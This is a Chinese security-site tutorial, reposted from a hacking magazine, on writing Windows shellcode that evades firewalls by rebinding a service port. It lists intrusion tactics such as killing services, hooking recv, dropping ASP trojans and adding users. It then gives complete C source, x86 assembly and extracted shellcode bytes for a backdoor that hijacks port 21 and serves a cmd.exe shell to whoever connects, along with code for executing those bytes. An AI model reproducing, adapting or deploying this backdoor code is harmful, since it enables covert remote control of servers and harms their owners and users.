您没有来错地!为了更好的发展,黑基网已于9月19日正式更名为【安基网】,域名更换为www.safebase.cn,请卸载旧的APP并安装新的APP,给您带来不便,敬请理解!谢谢

黑基Web安全攻防班
安基网 首页 IT技术 安全攻防 查看内容

ShellCode编写实例—突破防火墙的ShellCode

2009-5-13 10:38| 投稿: security

摘要: 适合读者:漏洞研究员、入侵爱好者前置知识:C、汇编阅读能力,调试工具使用能力     WTF:最近网络上开始流传各种各样的ShellCode,很多朋友都开始关注...
适合读者:漏洞研究员、入侵爱好者前置知识:C、汇编阅读能力,调试工具使用能力     WTF:最近网络上开始流传各种各样的ShellCode,很多朋友都开始关注ShellCode的编写和相关技术的实现方法。黑防不断推出的“菜鸟版Exploit编写指南”系列文章受到很多热爱系统漏洞的朋友们的喜爱,但大家在了解基本的漏洞调试、利用方法后,开始关注更高层次的ShellCode的编写。本期“溢出研究”栏目推出了《打造Windows下自己的ShellCode》一文,讲解了Windows下ShellCode的编写步骤,并且以打开DOS窗口的代码为例,详细介绍了编写、提取ShellCode的整个过程。但开一个本地DOS窗口的功能还是略显简陋。在网络环境下,ShellCode至少要能开一个网络连接后门,或者能上传下载文件才算有用。所以本篇文章更实际一点,难度也高些。希望给国内的网络安全爱好者们送上一道色香味具全的新年大餐! ShellCode编写实例——突破防火墙的ShellCode     现在网络上获得控制台的ShellCode要么是在目标机上开一个端口,等待攻击者连接;要么是让目标机主动连接攻击者的主机,俗称反向连接。但前种方法一般都会被防火墙挡住,而后者反连不但需要攻击者有一个公网IP,而且也会被目标机端禁止外连访问的防火墙挡掉。那有没有更好的办法呢?    当然有了!不然大家认为WTF老大会让我在这里瞎折腾?!    第一种方法就是复用攻击时的Socket。我们在给目标机发送攻击字符串的时候,就使用了Socket,如果还存在,我们把它找到并回收利用。ShellCode完成的功能是查找进程中所有的Socket并依次判断,如果是那个发送攻击字符串的Socket,就使用它来传文件,开后门等等。    第二种方法是复用端口。作为服务器,防火墙总会打开提高服务所需要的端口,比如FTP的21端口,IIS的80端口等。我们在ShellCode中复用这些防火墙打开的端口,并完成自己想要的功能。    第三种方法是终止掉目标机上的FTP或IIS等服务,然后再占用21、80等端口。这种方法在法二失败的情况下可以使用。    还有其它的一些方法,比如红色代码蠕虫使用的Hook技术,它是把TcpSockSend函数替换掉,这样发给任何客户的信息都是“Hacker by Chinese”,我们也可以把接收函数Recv函数Hook掉,保证即执行攻击者发过去的命令,又不影响正常的服务。    另外还可以查找Socket,把所有的Socket都绑定一个DOS Shell;如果知道网站的物理路径,还可以由ShellCode直接创建一个ASP木马!当然还可以添加用户,创建虚拟映射盘,直接写一个EXE的木马并执行等……方法很多,要用发散性的思维考虑!只要想的到,不要管做得到做不到!    不管做得到做不到?这些思路都可以实现吗?其实在《Windows下ShellCode编写初步》一文中已经讲过,ShellCode就是一段代码的机器码形式,所以只要ShellCode不要太长,并符合特殊字符的规划,运行起来是不会有问题的。来个实际的编写例子吧,这里就以第二种思路――复用端口,来讲解突破防火墙ShellCode的实现。     C实现重用端口    一般情况下,已经绑定的端口是不能再次被绑定的,但可以使用Setsockopt函数来改变这一点。Setsockopt函数原型如下,int setsockopt(SOCKET s,int level,int optname,const char* optval,int optlen);    第一个参数为要改变的Socket标志符,第二个参数为选项的等级,第三个参数就是要改成的选项名了,第四第五个参数为请求值缓冲区的指针和大小。具体实现时,把第三个参数设为SO_REUSEADDR,就可以重用已绑定的端口了。代码如下:BOOL val = TRUE;setsockopt(listenFD, SOL_SOCKET, SO_REUSEADDR, (char *)&val, sizeof(val)    其它的和一般的后门编写就一样了。怎么样,很简单吧?    WTF:该方法只有在原来的程序没有使用SO_EXCLUSIVEADDRUSE选项来绑定端口的情况下,才能使用SO_REUSEADDR成功。如果使用了SO_EXCLUSIVEADDRUSE选项,就只能用其它的方法绑定端口了。     Telnet后门的编写    端口可以重用之后,总要加点功能来显示这种方法的优劣吧?空说复用端口好有什么用呢?所以再加上一个大家都看得见的功能:给连接端口的客户开一个远程的Shell。    开远程的Shell比较简单,用CreateProcess函数建立CMD进程,并把进程的输入输出和错误句柄都换成我们的Socket就可以了。注意这里的Socket要用WSASocket函数建立才能这样替换,而用Socket函数建立的就只能用管道来通信了。这些不在本文的讨论之内,大家可以参看以前和将来的黑防,都会有讲的。C实现的程序如下。int main(){WSADATA ws;SOCKET listenFD;int ret;//初始化wsaWSAStartup(MAKEWORD(2,2),&ws);//注意要用WSASocketlistenFD = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, 0, 0);//设置套接字选项,SO_REUSEADDR选项就是可以实现端口重绑定的 //但如果指定了SO_EXCLUSIVEADDRUSE,就不会绑定成功BOOL val = TRUE;setsockopt(listenFD, SOL_SOCKET, SO_REUSEADDR, (char *)&val, sizeof(val) ); //监听本机21端口struct sockaddr_in server;server.sin_family = AF_INET;server.sin_port = htons(21);server.sin_addr.s_addr = inet_addr("127.0.0.1");ret=bind(listenFD,(sockaddr *)&server,sizeof(server));ret=listen(listenFD,2);//如果客户请求21端口,接受连接int iAddrSize = sizeof(server);SOCKET clientFD=accept(listenFD,(sockaddr *)&server,&iAddrSize);STARTUPINFO si;ZeroMemory(&si,sizeof(si));si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;//设置为输入输出句柄为Socketsi.hStdInput = si.hStdOutput = si.hStdError = (void *)clientFD;char cmdLine[] = "cmd";PROCESS_INFORMATION ProcessInformation;//建立进程 ret=CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);return 0;}测试一下,先安装一个Serv_U FTP服务器,那么它会打开21端口。如果Telnet 21端口,就会得到Serv_U的Banner,如下图1所示。 图1     现在执行我们的程序,就会重新绑定21端口。用Netstat –an查看,会发现有两个21端口在监听,一个的IP是0.0.0.0,一个是127.0.0.1。如图2所示。 图2 现在再Telnet 21端口,这次得到的是Shell!哈哈,没错,我们的程序抢掉了Serv_U用的21端口,突破成功!如图3所示。 图3     汇编的编写    C程序代码成功实现后,就要把它变为有ShellCode特点的汇编了。《打造Windows下自己的ShellCode》一文中分析过,Windows下函数的调用是先将参数从右到左入栈,然后Call 函数的地址,所以首先要找出所有函数的地址并记下来。    我写了个“FindAddress.cpp”,来查找这次所有要用的函数地址。先LoadLibrary函数所在的Dll,再GetProcAddress函数名,最后打印出得到的地址。以后要查找其它函数地址时,只要更改LoadLibrary和GetProcAddress参数里的Dll名和函数名就可以了。在我的系统XP sp0下,执行的效果如下图4所示。 图4     在汇编代码中,把找出来的函数地址保存下来,以备后用。这里用的是固定的API函数地址,以后介绍了动态获取函数地址后,只需要加上动态查找那部分,而后面部分可以保持不动就继续使用了。这也算是一种工程的思想吧。地址找到后,开始实现每个函数,函数实现完毕,汇编就写出来了。    第一个是WSAStartup(MAKEWORD(2,2),&ws), 随便减Esp 0x200,将Esp作为WS的地址,而MAKEWORD(2,2)就是0x202,所以直接Push 0x202就可以了。汇编实现如下:sub esp, 0x200    push esp   //第二个参数&wsa    push 0x202   //第一个参数0x202    call dword ptr [ebp + 0x8] //[ebp+0x8]中存着WSAStartup的地址,执行    add esp, 0x200    第二个是执行WSASocket(AF_INET,SOCK_STREAM,IPPROTO_TCP,NULL,0,0),这有点麻烦,那些参数值是多少呢?一种方法点右键,选择“goto 定义”,就可以找到对应的值,但遇到参数比较多的时候就比较慢;另一种方法,借用写好的C程序,按F10进入调试,按Debug工具栏上的Disassemble按钮,就出现了对应的汇编代码。如下图5所示。 图5     看,对应的值不就出来了吗?我们只要仿照着,依次Push 0 0 0 6 1 2,再Call WSASocketA函数的地址就行了。以前说过,WSASocketA函数执行完后,EAX会存放函数的返回值,所以这里的EAX就是建立的Socket,我们把它保存在Ebx中,在后面会使用。mov ebx, eax                ; save Socket to ebx    下一句是“setsockopt(listenFD, SOL_SOCKET, SO_REUSEADDR, (char *)&val, sizeof(val) )”,用同样的方法,就会知道Sizeof(val)=4,SO_REUSEADDR为4,SOL_SOCKET为0FFFFh。那第四个参数(char *)&val怎么表示呢?其实Val=true,就是0x00000001,那么&val就是0x00000001的地址,我们在堆栈中构造出0x00000001,把它的地址当参数就可以了。mov eax, 0x00000001push eaxmov esi, esp ;这样把&val存在esi中。再执行Setsockopt就是:   push 4    //第五个参数sizeof(val)=4    push esi   //第四个参数&val    push 4    //第三个参数SO_REUSEADDR    push 0FFFFh   //第二个参数SOL_SOCKET    push ebx   //第一个参数,WSASocket建立的Socket         Call dword ptr [ebp+0x16]//[ebp+0x16]中存着setsockopt的地址,执行OK!瞬间完成了一半的工作量,看着汇编一段一段的写好,真是件惬意的事啊!好了,该第四个函数了:“bind(listenFD,(sockaddr *)&server,sizeof(server));”,方法同上,第二个参数&server是一个sockaddr_in结构的地址,而且里面还有对端口、地址的设置,就是这三句:server.sin_family = AF_INET;server.sin_port = htons(21);server.sin_addr.s_addr = inet_addr("127.0.0.1");    怎么转换比较简单呢?还是借助C程序的调试过程!在调试时,从Debug工具栏上调出Memory窗口,输入Server,就可以看到Server这个结构的值,在赋值完毕之后,变成02 00 00 15 7F 00 00 01,如下图6所示。 图6     而且通过这个过程还知道,第一个0002是AF_INET,1500是htons(21),最后的0100007F是Inet_addr(“127.0.0.1”)得到的值。我们就依着葫芦画瓢,模仿着构造出Server的值,并把地址给Esi保存,代码如下:   push 0x0100007F    push 0x15000002     mov esi,esp   //构造server的值,并把地址赋给esi   有了Server参数后,就可以执行Bind函数了:   push 10h   //第三个参数sizeof(server)=10h    push esi   //第二个参数server的地址    push ebx   //第一个参数Socket    call dword ptr [ebp+0x20] //[ebp+0x20]中存着bind的地址,执行 那接下来的Listen(listenFD,2)就太简单了,实现如下:push 2;    //第二个参数2    push ebx;   //第一个参数Socket    call dword ptr [ebp+0x24]; //[ebp+0x24]中存着listen的地址,执行 随后的Accept(listenFD,(sockaddr *)&server,&iAddrSize)也能轻松搞定,为:   push 10h   //构造iAddrSize,地址为esp    push esp   //第三个参数&iAddrSize    push esi   //第二个参数&server    push ebx   //第一个参数Socket    call dword ptr [ebp+0x28] //[ebp+0x28]中存着accept的地址,执行 当然,因为后面要用到Accept后产生的Socket,所以把它保存在Ebx中。mov ebx, eax //把新Socket保存在ebx中这样就到了最关键的决定成败的最终BOSS:“CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation);”。哇,大概看一看,好多参数,真吓人!但仔细一看,原来是纸老虎,参数基本上都是0和1,要构造的只有三个,那就简单了。0和1就不说了,直接Push就可以了,&ProcessInformation最简单,因为不用赋初值,随便找个不用的地址就可以了,CmdLine也好解决,“cmd” 就是63 6d 64 00,构造在Ebp+0x32中,把Ebp+0x32的地址当参数压就可以了。只剩下&si了,对它的赋值有几句话,ZeroMemory(&si,sizeof(si));si.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;//设置为输入输出句柄为Socketsi.hStdInput = si.hStdOutput = si.hStdError = (void *)clientFD;就是先清零,再设置Flag和句柄。我们在调试过程中,仔细地、慢慢地、温柔地数,最后可以知道Si+2ch的地方为Flag地址,“Si+38h Si+3ch Si+40h”的地方为输入输出和错误句柄。那么在汇编中构造Si就是:   lea edi,[esp];     mov word ptr [edi+2ch], 0x0101;   //si.dwFlags =0x0101    mov [edi+38h],ebx;      //si.hStdInput    mov [edi+3ch],ebx;      //si.hStdOutput    mov [edi+40h],ebx;      //si.hStdError = Socket 实现CreateProcess如下:    //暂存cmd.exe字符串于ebp+0x32中    mov dword ptr [ebp+0x32],0x00646d63;       lea eax,[esp+0x44]    push eax    //最后一个参数&ProcessInformation    push edi    //&si    push 0    //0    push 0    //0    push 0    //0    push 1    //1    push 0    //0    push 0    //0    lea eax,[ebp+0x32]     push eax    //"cmd"    push 0    //0    call [ebp+0x4]   //[ebp+0x4]中存着CreateProcessA的地址,执行 ShellCode的获取和验证好了,把汇编连起来,得到“ReBindASM.cpp”验证一下,呵呵,还是成功。如图7所示。 图7 有一个出错对话框——当然了,我们的Esp ebp都被覆盖了,当然会出错。感兴趣的读者可以自己下去把它们恢复一下。剩下我们最感兴趣的ShellCode的提取了。《打造Windows下自己的ShellCode》中讲过,在得到汇编后,可以进行调试,然后把汇编对应的机器码一个一个的抄下来。这里当然也可以这样,但代码太多了,一个个的抄也太郁闷了吧……我们换个方法。进入调试,在调试进入我们的汇编时,在Memory窗口中输入Eip,这样出现的就是我们ShellCode在内存中的值,如下图8所示。 图8 这下简单了,把ShellCode从开始到结束粘贴下来,删掉多于的字符,把空格替换成’\x’,就得到重用端口,突破防火墙的ShellCode如下:char ShellCode[] = "\x55\x83\xEC\x40\x8B\xEC\xC7\x45\x04\xB8\x1B\xE4\x77\xC7\x45\x08\xDA\x41\xA2\x71\xC7\x45\x12\x01\x5A\xA2\x71""\xC7\x45\x16\x8D\x3F\xA2\x71\xC7\x45\x20\xCE\x3E\xA2\x71\xC7\x45\x24\xE2\x5D\xA2\x71\xC7\x45\x28\x8D\x86\xA2""\x71\x81\xEC\x00\x02\x00\x00\x54\x68\x02\x02\x00\x00\xFF\x55\x08\x81\xC4\x00\x02\x00\x00\x6A\x00\x6A\x00\x6A""\x00\x6A\x06\x6A\x01\x6A\x02\xFF\x55\x12\x8B\xD8\xB8\x01\x00\x00\x00\x50\x8B\xF4\x6A\x04\x56\x6A\x04\x68\xFF""\xFF\x00\x00\x53\xFF\x55\x16\x68\x7F\x00\x00\x01\x68\x02\x00\x00\x15\x8B\xF4\x6A\x10\x56\x53\xFF\x55\x20\x6A""\x02\x53\xFF\x55\x24\x6A\x10\x54\x56\x53\xFF\x55\x28\x8B\xD8\x81\xEC\x80\x00\x00\x00\x8D\x3C\x24\x33\xC0\x68""\x80\x00\x00\x00\x59\xF3\xAA\x8D\x3C\x24\x66\xC7\x47\x2C\x01\x01\x89\x5F\x38\x89\x5F\x3C\x89\x5F\x40\xC7\x45""\x32\x63\x6D\x64\x00\x8D\x44\x24\x44\x50\x57\x6A\x00\x6A\x00\x6A\x00\x6A\x01\x6A\x00\x6A\x00\x8D\x45\x32\x50""\x6A\x00\xFF\x55\x04";在Main函数里面,嵌入如下代码就可以将ShellCode当成函数执行:lea eax, ShellCode;   call eax测试一下,哈哈,还是成功了。如图9所示。 图9     这样我们就亲自打造出了一个ShellCode,而且这个ShellCode在外面是绝对找不到的哦,呵呵,知道为什么吗?因为这个ShellCode根本不能用啊!(豆大的汗珠从WTF后脑勺上滴下……)一是因为使用的是XP SP0的函数绝对地址,只能在XP SP0下用,如果是2000,或者XP的另外版本,都会失败;二是绑定的是127.0.0.1,其实需要对方的实际IP地址。要解决这两个问题,一是需要动态的获得函数地址,来把我们这个ShellCode改为通用的;二是加入对方IP和端口的定制,这样打造出的才是完美的ShellCode。不过,杂志嫌薄,版面苦短,就留到下一次介绍吧!欲知后事如何,且听下回分解!

小编推荐:欲学习电脑技术、系统维护、网络管理、编程开发和安全攻防等高端IT技术,请 点击这里 注册黑基账号,公开课频道价值万元IT培训教程免费学,让您少走弯路、事半功倍,好工作升职加薪!



免责声明:本文由投稿者转载自互联网,版权归原作者所有,文中所述不代表本站观点,若有侵权或转载等不当之处请联系我们处理,让我们一起为维护良好的互联网秩序而努力!联系方式见网站首页右下角。


鲜花

握手

雷人

路过

鸡蛋

相关阅读

最新评论

最新

返回顶部